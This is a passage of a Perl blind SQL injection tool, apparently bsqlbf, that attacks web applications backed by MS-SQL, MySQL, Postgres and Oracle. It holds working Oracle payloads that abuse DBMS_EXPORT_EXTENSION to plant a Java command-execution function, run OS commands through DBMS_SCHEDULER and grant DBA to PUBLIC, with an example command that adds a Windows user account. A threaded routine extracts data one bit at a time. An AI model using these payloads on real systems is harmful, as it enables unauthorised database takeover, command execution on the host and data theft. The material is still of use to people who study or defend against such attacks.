  763. die "Couldn't get $url" unless defined $content;
  764.  
  765.  
  766.   if(! ($content =~ m/($match)/i)) {
  767.     print "-----------------------------------------------\n";
  768.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
  769.     print "-----------------------------------------------\n";
  770.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  771.   } else {
  772.     print "NO errors encountered.....proceeding to step..3\n";
  773.     print "--------------------------------\n";
  774.    
  775. # print $content;
  776. }
  777.  
  778. #-----------------------
  779. print "Step 3. creating funtion for reading files...\n";
  780. my $url=$url_1.$cmd_exec_func;
  781. my $content = get_or_post($method,$url,$cookie,$proxy);
  782. die "Couldn't get $url" unless defined $content;
  783.  
  784.  
  785.   if(! ($content =~ m/($match)/i)) {
  786.     print "-----------------------------------------------\n";
  787.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
  788.     print "-----------------------------------------------\n";
  789.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  790.   } else {
  791.     print "NO errors encountered.....proceeding to step..4\n";
  792.     print "--------------------------------\n";
  793.    
  794. # print $content;
  795. }
  796.  
  797. #-----------------------
  798. print "Step 4. making function executable by all users...\n";
  799. my $url=$url_1.$cmd_exec_func_priv;
  800. my $content = get_or_post($method,$url,$cookie,$proxy);
  801. die "Couldn't get $url" unless defined $content;
  802.  
  803.  
  804.   if(! ($content =~ m/($match)/i)) {
  805.     print "-----------------------------------------------\n";
  806.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
  807.     print "-----------------------------------------------\n";
  808. #   print "I will proceed, however, there is a possibility that the attack will fail\n";
  809.     exit 0;
  810.   } else {
  811.     print "NO errors encountered.......\n";
  812.     print "SUCCESS: I have created the function sys.LinxReadFile()....\n";
  813.     print "Now I will launch bsqlbf again to use this function and read the file you asked me to read....:)\n";
  814.     print "--------------------------------\n";
  815.    
  816. # print $content;
  817. }
  818.  
  819. #-----------------------
  820. #print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
  821. #print "--------------------------------\n";
  822. #print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
  823. #print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
  824. #my $url=$url_1.$cmd_exec;
  825. #my $content = get_or_post($method,$url,$cookie,$proxy);
  826. #die "Couldn't get $url" unless defined $content;
  827. #
  828. #
  829. #  if(! ($content =~ m/($match)/i)) {
  830. #   print "-----------------------------------------------\n";
  831. #    print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
  832. #   print "-----------------------------------------------\n";
  833. #   print "...You need to investigate buddy....\n";
  834. #   exit 0;
  835. #  } else {
  836. #   print "-----------------------------------------------\n";
  837. #   print "SUCCESS: I have created the function sys.LinxReadFile()....\n";
  838. #   print "Now I will launch bsqlbf again to use this function and read the file you asked me to read....:)\n";
  839. #   print "-----------------------------------------------\n";
  840. #
  841. #  }   
  842. #-----------------------
  843. #print "Step 6. Droping function sys.LinxRunCMD...\n";
  844. #my $url=$url_1.$cmd_exec_func_unpriv;
  845. #my $content = get_or_post($method,$url,$cookie,$proxy);
  846. #die "Couldn't get $url" unless defined $content;
  847. #
  848. #  if(! ($content =~ m/($match)/i)) {
  849. #   print "-----------------------------------------------\n";
  850. #    print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
  851. #   print "-----------------------------------------------\n";
  852. #   print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
  853. #   exit 0;
  854. #  } else {
  855. #   print "Function dropped..\n";
  856. #   exit 0;
  857. #}
  858.    
  859.  
  860.  
  861.  
  862.  
  863.  
  864.  
  865.  
  866.  
  867.  
  868.  
  869. }
  870.  
  871. ####################### Type 5 stops here #########################################
  872.  
  873.  
  874. ############################ Type 4###########################################
  875.     if($type==4)
  876.     {
  877.        
  878.        
  879.         print "--------------------------------\n";
  880.         print "Oracle O.S command execution\n";
  881.         print "\n\n!!!!Note!!!!: Please provide the vulnerable parameter as the last parameter\n";
  882.         print "Supported versions <=:\n(Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE)\n\n";
  883.         print "--------------------------------\n\n\n";
  884.         print "String to Match: ".$match."\n";
  885.        
  886.         #-----ora_cmd.pl--starts here
  887. ################################## S Type: 0########################################
  888.         if ($stype==0) {
  889.        
  890.         print "You asked me to execute \"".$cmd."\" on remote box with stype:".$stype."\n";
  891.         print "--------------------------------\n\n\n";
  892.  
  893. my $url_1 = $url." and ";
  894. my $javalib="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str %2b=stemp%2b\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  895.  
  896. my $javaperm="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  897.  
  898. my $cmd_exec_func="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  899.  
  900. my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  901. my $cmd_exec_func_unpriv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual)is null--";
  902.  
  903. my $cmd_1=$cmd;
  904. my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual) is null--";
  905.  
  906. print "Step 1. Creating Java Library...\n";
  907. #print "--------------------------------\n";
  908. my $url=$url_1.$javalib;
  909. #print $method;
  910. #print $url;
  911. my $content = get_or_post($method,$url,$cookie,$proxy);
  912. die "Couldn't get $url" unless defined $content;
  913.  
  914.  
  915.   if(! ($content =~ m/($match)/i)) {
  916.     print "-----------------------------------------------\n";
  917.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
  918.     print "-----------------------------------------------\n";
  919.   } else {
  920.     print "NO errors encountered.....proceeding to step..2\n";
  921.     print "--------------------------------\n";
  922.    
  923. # print $content;
  924. }
  925.  
  926. #-----------------------
  927. print "Step 2. granting java execute privileges...\n";
  928. my $url=$url_1.$javaperm;
  929. my $content = get_or_post($method,$url,$cookie,$proxy);
  930. die "Couldn't get $url" unless defined $content;
  931.  
  932.  
  933.   if(! ($content =~ m/($match)/i)) {
  934.     print "-----------------------------------------------\n";
  935.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
  936.     print "-----------------------------------------------\n";
  937.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  938.   } else {
  939.     print "NO errors encountered.....proceeding to step..3\n";
  940.     print "--------------------------------\n";
  941.    
  942. # print $content;
  943. }
  944.  
  945. #-----------------------
  946. print "Step 3. creating funtion for command execution...\n";
  947. my $url=$url_1.$cmd_exec_func;
  948. my $content = get_or_post($method,$url,$cookie,$proxy);
  949. die "Couldn't get $url" unless defined $content;
  950.  
  951.  
  952.   if(! ($content =~ m/($match)/i)) {
  953.     print "-----------------------------------------------\n";
  954.     print "ERROR at STAGE 3 occured !!!...something was not right.. \n";
  955.     print "-----------------------------------------------\n";
  956.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  957.   } else {
  958.     print "NO errors encountered.....proceeding to step..4\n";
  959.     print "--------------------------------\n";
  960.    
  961. # print $content;
  962. }
  963.  
  964. #-----------------------
  965. print "Step 4. making function executable by all users...\n";
  966. my $url=$url_1.$cmd_exec_func_priv;
  967. my $content = get_or_post($method,$url,$cookie,$proxy);
  968. die "Couldn't get $url" unless defined $content;
  969.  
  970.  
  971.   if(! ($content =~ m/($match)/i)) {
  972.     print "-----------------------------------------------\n";
  973.     print "ERROR at STAGE 4 occured !!!...something was not right.. \n";
  974.     print "-----------------------------------------------\n";
  975.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  976.   } else {
  977.     print "NO errors encountered.....proceeding to step..5\n";
  978.     print "--------------------------------\n";
  979.    
  980. # print $content;
  981. }
  982.  
  983. #-----------------------
  984. print "Step 5. RIGHT!!!, by now we should have a function sys.LinxRunCMD through which we can execute commands...\n";
  985. print "--------------------------------\n";
  986. print "You should be able to execute this function as:\nselect sys.LinxRunCMD('cmd.exe /c net user notsosecure n0ts3cur3 /add') from dual\n";
  987. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
  988. my $url=$url_1.$cmd_exec;
  989. my $content = get_or_post($method,$url,$cookie,$proxy);
  990. die "Couldn't get $url" unless defined $content;
  991.  
  992.  
  993.   if(! ($content =~ m/($match)/i)) {
  994.     print "-----------------------------------------------\n";
  995.     print "ERROR at STAGE 5 occured !!!...something was not right.. \n";
  996.     print "-----------------------------------------------\n";
  997.     print "...You need to investigate buddy....\n";
  998.   } else {
  999.     print "-----------------------------------------------\n";
  1000.     print "SUCCESS: Your command executed on the box....:)\n";
  1001.     print "-----------------------------------------------\n";
  1002.  
  1003.   }
  1004. #-----------------------
  1005. print "Step 6. Droping function sys.LinxRunCMD...\n";
  1006. my $url=$url_1.$cmd_exec_func_unpriv;
  1007. my $content = get_or_post($method,$url,$cookie,$proxy);
  1008. die "Couldn't get $url" unless defined $content;
  1009.  
  1010.   if(! ($content =~ m/($match)/i)) {
  1011.     print "-----------------------------------------------\n";
  1012.     print "ERROR at STAGE 6 occured !!!...something was not right.. \n";
  1013.     print "-----------------------------------------------\n";
  1014.     print "!!!!WARNING:I have not been able to drop the function..!!!!!!\n";
  1015.     exit 0;
  1016.   } else {
  1017.     print "Function dropped..\n";
  1018.     exit 0;
  1019. }
  1020.     }
  1021.   # this completes stype=0
  1022.        
  1023.  
  1024. ###############################---stype 0--- stops here##########################
  1025.  
  1026. ###############################---stype 1--- starts here##########################
  1027.  
  1028.  
  1029.         if ($stype==1) {
  1030.             print "Command execution in oracle 9 with plsql_native_make_utility.. not yet ready..:(\n";
  1031.         exit 0;
  1032.         }
  1033.  
  1034.  
  1035.  
  1036. ###############################---stype 1--- stops here##########################
  1037.  
  1038. ###############################-stype 2--starts here--##############################
  1039.         if ($stype==2) {
  1040.             print "O.S command execution with dbms_scheduler\n";
  1041.             print "\n\n!!NOTE:!!! Supply commands with full paths such as:\n";
  1042.             print "c:\\WINDOWS\\system32\\cmd.exe /c c:\\whoami.exe >> c:\\bsql.txt\n\n\n";
  1043.             if ($cmd eq "ping 127.0.0.1") {
  1044.              $cmd = "C:\\windows\\system32\\cmd.exe /c C:\\windows\\system32\\whoami.exe >> C:\\notsosecure.txt";
  1045.              print "Executing default cmd: ".$cmd. "\n";
  1046.             }
  1047.             #------ora_cmd_v10.pl startes here------
  1048.  
  1049.  
  1050. my $cmd_1=$cmd;
  1051. my $url_1 = $url." and ";
  1052. my $step1="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin DBMS_SCHEDULER.create_program(''''''''bsql5'''''''',''''''''EXECUTABLE'''''''',''''''''".$cmd_1."'''''''',0,TRUE); end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  1053.  
  1054. my $step2="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin DBMS_SCHEDULER.create_job(job_name => ''''''''bsql5job'''''''',program_name => ''''''''bsql5'''''''',start_date => NULL,repeat_interval => NULL,end_date => NULL,enabled => TRUE,auto_drop => TRUE); end;'''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  1055.  
  1056. my $step3="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' begin DBMS_SCHEDULER.drop_program(PROGRAM_NAME => ''''''''bsql5''''''''); end; '''';END;'';END;--','SYS',0,'1',0) from dual) is null--";
  1057.  
  1058. #my $cmd_exec_func_priv="(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD
  1059. #to public'''';END;'';END;--','SYS',0,'1',0) from dual)--";
  1060.  
  1061.  
  1062. #my $cmd_exec="(select sys.LinxRunCMD('cmd.exe /c". $cmd_1. "') from dual)--";
  1063.  
  1064. print "Step 1...Creating job........\n";
  1065. print "--------------------------------\n";
  1066. my $url=$url_1.$step1;
  1067. #print $method;
  1068. my $content = get_or_post($method,$url,$cookie,$proxy);
  1069. die "Couldn't get $url" unless defined $content;
  1070.  
  1071.  
  1072.   if(! ($content =~ m/($match)/i)) {
  1073.     print "-----------------------------------------------\n";
  1074.     print "ERROR at STAGE 1 occured !!!...did you provide me the URL in the format, i want?? \n";
  1075.     print "-----------------------------------------------\n";
  1076.   } else {
  1077.     print "\nNO errors encountered.....proceeding to step..2\n";
  1078.     print "--------------------------------\n";
  1079.    
  1080.  #print $content;
  1081. }
  1082.  
  1083. #-----------------------
  1084. print "Step 2.....Executing Job......\n";
  1085. print "I will execute the command you told me to execute... you won't be able to see the output though :( \n";
  1086. my $url=$url_1.$step2;
  1087. #print $url."\n";
  1088. my $content = get_or_post($method,$url,$cookie,$proxy);
  1089. die "Couldn't get $url" unless defined $content;
  1090.  
  1091.  
  1092.   if(! ($content =~ m/($match)/i)) {
  1093.     print "-----------------------------------------------\n";
  1094.     print "ERROR at STAGE 2 occured !!!...something was not right.. \n";
  1095.     print "-----------------------------------------------\n";
  1096.     print "I will proceed, however, there is a possibility that the attack will fail\n";
  1097. #   print $content;
  1098.   } else {
  1099.     print "NO errors encountered.....proceeding to step..3\n";
  1100.     print "--------------------------------\n";
  1101.     #print $content;
  1102. }
  1103.  
  1104. #-----------------------
  1105.  
  1106.  
  1107. print "\nStep 3. Removing Job...\n";
  1108. print "----------sleeping for 15 secs-----------------------------\n";
  1109. sleep(15);
  1110. my $url=$url_1.$step3;
  1111. my $content = get_or_post($method,$url,$cookie,$proxy);
  1112. die "Couldn't get $url" unless defined $content;
  1113.  
  1114.  
  1115.   if(! ($content =~ m/$match/i)) {
  1116.     print "-----------------------------------------------\n";
  1117.     print "ERROR at Step 3 occured !!!...something was not right.. \n";
  1118.     print "-----------------------------------------------\n";
  1119.     print "...You need to investigate buddy....\n";
  1120.     print $content;
  1121.    
  1122.   } else {
  1123.     print "-----------------------------------------------\n";
  1124.     print "SUCCESS: Your command executed on the box....:)\n";
  1125.     print "-----------------------------------------------\n";
  1126.    
  1127. # print $content;
  1128. }
  1129.  
  1130.  
  1131.             #------ora_cmd_v10.pl stops here------
  1132.                
  1133.                
  1134.                
  1135.                
  1136.                
  1137.                
  1138.                
  1139.                
  1140.                
  1141.                
  1142.                 exit 0;}   
  1143.                
  1144. ###############---stype 2---stops here-------##########################
  1145.  
  1146.         }
  1147.  
  1148. ######################---type 4 stops here##############################
  1149.        
  1150.        
  1151.    
  1152.                        
  1153.                
  1154. ########################--type 3 starts here---###########################
  1155. if($type==3)
  1156.     {
  1157.         print "--------------------------------\n";
  1158.         print "Oracle Privilege escalation\n\n";
  1159.         print "Supported versions less <=:\n(Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE)\n\n";
  1160.         print "--------------------------------\n";
  1161.         print "\n\n!!!Note:!!! Please provide the vulnerable parameter as the last parameter\n";
  1162.         print "I will \"GRANT DBA TO PUBLIC\" and Later REVOKE it back\n\n";
  1163.         print "--------------------------------\n";
  1164.         print "String to match: ".$match."\n";
  1165.  
  1166.  
  1167. my $grantdbatopub=" and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual) is null --";
  1168.  
  1169. #my $grantpriv=" and 1=(select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on linx_query to public'''';END;'';END;--','SYS',0,'1',0) from dual)--";
  1170. my $url_1=$url.$grantdbatopub;
  1171. print "\n...sending request..\n";
  1172. print "\n";
  1173.  
  1174.  
  1175. my $content;
  1176. $content = get_or_post($method,$url_1,$cookie,$proxy);
  1177. die "Couldn't get $url" unless defined $content;
  1178. my $match_1 eq "Warning";
  1179.  
  1180. if (!$match) {
  1181.     print "you did not supply any match string, i will look for Warning keyword..\n";
  1182.     print "tying to match:".$match_1."\n";}
  1183.  
  1184.   if(! ($content =~ m/$match/i)) {
  1185.         print "-----------------------------------------------\n";
  1186.     die "ERROR occured !!!...did you provide me the URL in the format, i want?? \n";
  1187.         print "-----------------------------------------------\n";
  1188.         die "cannot proceed";  
  1189.   } else {
  1190.               print "--------------------------------\n";
  1191.               print "No Errors Encountered...We are DBA now....\n";
  1192.               print "--------------------------------\n";
  1193.  
  1194.   }
  1195.  
  1196.  
  1197.     }
  1198.  
  1199. #################### Type 3 stops here#################################
  1200.  
  1201. ( ! $get) ? sqlget() : fileget();
  1202.  
  1203. my @byte = ();
  1204. my $wait_me;
  1205.  
# Reassemble one byte of the value of $sql from independent single-bit
# probes.  Each probe runs in its own detached thread (launch_thread,
# defined below); the threads are expected to write their bit into the
# shared @byte and advance the shared $wait_me counter, and getbyte
# spin-waits until that counter passes 7 before packing the bit string.
#
# Argument:  $sql - expression whose character value is recovered one
#                   bit at a time.
# Returns:   the recovered character as a one-byte Perl string.
# Globals:   reads $ascii; writes the file-scoped $high, $wait_me and
#            @byte (the latter two are shared across threads).
sub getbyte {
   my $sql = $_[0];
   my $bit="";
   my @thread_count = ();
   my $c = 8;            # bit position handed to each thread (counts 8 -> 1)
   my $i = 0;            # NOTE(review): never incremented, so every handle
                         # lands in $thread_count[0]; harmless only because
                         # each thread is detached immediately.
   $high = 128 unless $ascii;   # probe bits 1..128 (8 threads) unless --ascii
   $wait_me = 0;

   share($wait_me);
   share (@byte);

   if ($ascii) {
     $byte[0] = 0;        # 7-bit ASCII: top bit is assumed 0 ...
     $high = 64;          # ... so only bits 1..64 are probed (7 threads)
   }
   for ($bit=1;$bit<=$high;$bit*=2) {
# launch thread ->
    $thread_count[$i] = threads->create(\&launch_thread ,$sql, $bit, $c);
    $thread_count[$i]->detach;
    $c--;
   }

   # Busy-wait for the probes to report.  NOTE(review): the exit test is
   # $wait_me > 7 whether 7 or 8 threads were started; how the counter
   # reaches that value in --ascii mode depends on launch_thread, whose
   # body is not fully visible here -- confirm.  There is no timeout, so a
   # probe that never completes hangs the caller.
   while ($wait_me <= 7) {
    usleep(50);                  # 50 microseconds (Time::HiRes)
    #sleep(1);# if !$dontsleep;
   }

   my $str = join("",@byte);     # expected: an 8-character "0"/"1" string
   #print "\nSTR: $str\n";
   return pack("B*","$str");     # bit string -> one byte

}
  1239.  
  1240. sub launch_thread {
  1241.     my ($sql, $bit, $c) = @_;
  1242.     my $val;   
  1243.     my $and="%26";
  1244.      if (lc($method) eq "post"){
  1245.      $and="&";
  1246.      }
  1247.      ###------------MS-SQL BLOCK STARTS HERE---------------------###
  1248.  
  1249. if ($database==0) {
  1250.  
  1251.  
  1252. #print "I am here";
  1253.         if ($url =~ /'$/) {
  1254.       ##   $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
  1255.  if ($type==1)
  1256.                       {
  1257.                          $val = "$head and (select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
  1258.                       }
  1259.               else {    if($type==0)
  1260.                       {    
  1261.               $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
  1262.                       }
  1263.  
  1264.                       else {    if($type==2)
  1265.                       {    
  1266.                          $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1-- $tail";
  1267.                       }
  1268.                    }  
  1269.  
  1270.     }}
  1271.                   else{
  1272.                        if ($type==1)
  1273.                       {
  1274.                          $val = "$head and (select case when ((ASCII($sql) $and $bit) =0)then 1 else 1/0 end)=1 $tail";
  1275.                       }
  1276.               else {    if($type==0)
  1277.                       {    
  1278.               $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
  1279.                       }
  1280.                      
  1281.                        else {   if($type==2)
  1282.                       {    
  1283.                          $val = "$head,(select case when((ASCII($sql) $and $bit) =0) then 1 else 1/0 end )=1 $tail";
  1284.                       }
  1285.                    }  
  1286.                    }  
  1287.                
  1288.                   }
  1289.  
  1290.  
  1291.                 }
  1292.  
  1293.  
  1294.      ###------------MS-SQL BLOCK STOPS HERE---------------------###
  1295.      ###----------POSTGRES BLOCK STARTS HERE---------------------###
  1296.  
  1297. if ($database==2) {
  1298.  
  1299.  
  1300.  
  1301.         if ($url =~ /'$/) {
  1302.    
  1303.  if ($type==1)
  1304.    
  1305.                       {
  1306.                          $val = "$head and (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)=1-- $tail";
  1307.                       }
  1308.               else {    if($type==0)
  1309.                       {    
  1310.               $val = "$head and (ASCII($sql) $and $bit)=0-- $tail";
  1311.                       }
  1312.                    
  1313.                    else {   if($type==2)
  1314.                       {    
  1315.                          $val = "$head,(case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end)-- $tail";
  1316.                       }
  1317.                    }  
  1318.                    }  
  1319.  
  1320.  
  1321.  
  1322.     }
  1323.                   else{
  1324.                        if ($type==1)
  1325.                       {
  1326.                          $val = "$head (case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end) $tail";
  1327.                       }
  1328.               else {    if($type==0)
  1329.                       {    
  1330.               $val = "$head and (ASCII($sql) $and $bit)=0 $tail";
  1331.                       }
  1332.  else { if($type==2)
  1333.                       {    
  1334.                          $val = "$head,(case when ((ASCII($sql) $and $bit) =0) then 1 else (1 * (select 1 from information_schema.tables)) end) $tail";
  1335.                       }
  1336.  
  1337.  
  1338.                    }  
  1339.  
  1340.                    }  
  1341.                
  1342.                   }
  1343.  
  1344.  
  1345.                 }
  1346. ###----------POSTGRES BLOCK STOPS HERE---------------------###
  1347. ###----------ORACLE BLOCK STARTS---------------------------####
  1348.      if ($database==3) {
  1349.      
  1350. if ($url =~ /'$/)
  1351. {
  1352.           if ($type==1)
  1353.    
  1354.                       {
  1355.                          $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1-- $tail";
  1356.                       }
  1357.               else {    if($type==0)
  1358.                       {    
  1359.                          $val = "$head and BITAND((ASCII($sql)), $bit)=0-- $tail";                 
  1360.                         }
  1361. else { 
  1362.     if($type==2)
  1363.                       {    
  1364.                          $val = "$head,(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)-- $tail";
  1365.                       }
  1366.       }
  1367.  
  1368.                    }  
  1369.  
  1370. }
  1371.                  
  1372.                   else{
  1373.  
  1374.  
  1375.  
  1376.                        if ($type==1)
  1377.                       {
  1378.                          $val = "$head and (select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)=1 $tail";
  1379.                       }
  1380.  
  1381.  
  1382.                 if($type==0)
  1383.                       {    
  1384.                $val = "$head and BITAND((ASCII($sql)), $bit)=0 $tail";
  1385.                       }
  1386.                      
  1387.            
  1388.                     if($type==2)
  1389.                        {       
  1390.                          $val = "$head,(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual) $tail";
  1391.                         }
  1392.                
  1393.                    
  1394.                    
  1395.                      
  1396.                if($type==3)
  1397.                   {
  1398.                  $val = "$head and 1=(select case when BITAND((ASCII($sql)), $bit)=0 then  (select 1 from dual) else 1/0  end from dual)-- $tail";
  1399.  
  1400.                   }
  1401.  
  1402.         }
  1403.  
  1404.  
  1405.  
  1406.  
  1407.  
  1408.  
  1409.                   }
  1410.  
  1411.  
  1412. ###----------ORACLE BLOCK STOPS HERE---------------------------####
  1413. ###------------MY-SQL BLOCK STARTS HERE---------------------###
  1414. #print $database;
  1415.    
  1416.     if ($database==1) {
  1417.    
  1418.    
  1419.     if ($url =~ /'$/)       {
  1420.           if ($type==1)
  1421.                       {
  1422.                          $val = "$head and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)='1 $tail";
  1423.                       }
  1424.  
  1425.               else {    if($type==0)
  1426.                       {    
  1427.               $val = "$head and (ord($sql) $and $bit)='0 $tail";
  1428.                       }
  1429.                  
  1430. # or one may also use #
  1431.                        
  1432.                         else {  if($type==2)
  1433.                       {    
  1434.                          $val = "$head,(select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)%23 $tail";
  1435.                       }
  1436.                    }    }
  1437.                            
  1438.                            
  1439.                     }
  1440.            
  1441.                  
  1442.                  
  1443.                  
  1444.                  
  1445.                  
  1446.                  
  1447.                  
  1448.                   else
  1449.                      
  1450.                 {
  1451.                       if ($type==1)
  1452.                       {
  1453.                          $val = "$head  and (select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end)=1 $tail";
  1454.                       }
  1455.               else {if($type==0)
  1456.                       {    
  1457.               $val = "$head and (ord($sql) $and $bit)=0 $tail";
  1458.                       }
  1459.                      
  1460.                  
  1461.  
  1462.                     else {  if($type==2)
  1463.                       {    
  1464.                          $val = "$head,(select case when (ord($sql) $and $bit=0 ) then 1 else 1*(select table_name from information_schema.tables)end) $tail";
  1465.                       }
  1466.                    }}  
  1467.                        
  1468.  
  1469.                 }
  1470. ###-----------MySQL BLOCK ENDS HERE-------------------###
  1471.  
  1472.  
  1473.  
  1474.  
  1475.  }
  1476.                   #print "VAL[$c] $val\n";
  1477.         if (lc($method) eq "post") {
  1478.                 $vars{$lastvar} = $lastval . $val;
  1479.  
  1480.         }
  1481.         $furl = $url;
  1482.         $furl =~ s/($lastvar=$lastval)/$1$val/;
  1483.         &createlwp if $rproxy || $ruagent;
  1484.         my $html=fetch("$furl");
  1485.         $hits++;
  1486.         foreach (split(/\n/,$html)) {
  1487.         lock @byte;
  1488.        
  1489.         if ($nomatch)
  1490.         { #print "NO match Supplied";
  1491.         #print $nomatch;
  1492.                 if (/\Q$nomatch\E/) {
  1493.                     $byte[$c]=1;
  1494.                     last;
  1495.                  } else { $byte[$c] = 0; }
  1496.                  }
  1497.                  
  1498.                  else {
  1499.                  #print "match supplied";
  1500.                   if (/\Q$match\E/) {
  1501.                     $byte[$c]=0;
  1502.                     last;
  1503.                  } else { $byte[$c] = 1; }
  1504.                  }
  1505.                  
  1506.                  
  1507.                  }
  1508.     lock $wait_me;
  1509.     threads->yield();
  1510.     $wait_me++;
  1511. }
  1512.  
# Extract the value of the -sql expression one character at a time.
#
# Every database branch has the same three-step shape and differs only in
# SQL dialect (len/length, substring/substr/mid, varchar/varchar2):
#   1. probe how many digits the length of the result has ($lng);
